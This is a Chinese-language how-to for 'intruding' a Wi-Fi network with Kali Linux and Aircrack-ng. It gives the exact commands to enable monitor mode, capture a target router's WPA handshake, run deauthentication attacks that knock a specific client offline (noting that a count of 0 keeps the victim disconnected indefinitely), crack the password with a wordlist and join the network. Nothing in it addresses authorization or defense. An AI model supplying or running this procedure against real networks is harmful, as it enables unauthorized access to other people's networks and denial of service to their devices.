设备
kali-linux
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。
Kali自带Aircrack-ng,无需再次安装。
无线网卡
使用RT3070系列或者其他系列的无线外置网卡。
购买时注意支持kali和免装驱动。
入侵wifi
无线网卡连接kali
打开kali虚拟机,插入无线网卡,选择连接到虚拟机。
查看网卡设备:
ifconfig
发现比之前多了一个wlan0网卡。
查看是否支持监听:
airmon-ng
发现wifi
开启无线网卡监控模式:
airmon-ng start wlan0
查看周围WIFI网络:
airodump-ng wlan0mon
红框中为我们要入侵的wifi。
监听目标wifi的握手包
监听目标网络的握手包:
airodump-ng -c 11 --bssid 60:3A:7C:6F:E1:FA -w ~/1/ wlan0mon
参数解释:
-c指定频道号
-bssid指定路由器bssid
-w指定抓取的数据包保存位置
强制对方WIFI断开重连(获取握手包):
新开终端,输入
aireplay-ng -0 2 -a 60:3A:7C:6F:E1:FA -c 32:FE:81:BC:54:8E wlan0mon
参数解释:
-0表示发起(鉴权)
2表示重新连接两次,2改成0,那对方就不停地输密码,也连不上
deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
破解握手包
破解握手包密码:
aircrack-ng -a2 -b 60:3A:7C:6F:E1:FA -w wifipass.txt ~/1/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID
-w指定字典文件
最后是抓取的包
选择握手包的加密方式:
-a1:指定WEP加密方式
-a2:指定WPA-PSK加密方式
破解成功。
连接wifi
关闭监听模式:
airmon-ng stop wlan0mon
之后就可以连接wifi了
连接wifi后,输入ifconfig,就会发现wlan0网卡有了ip地址。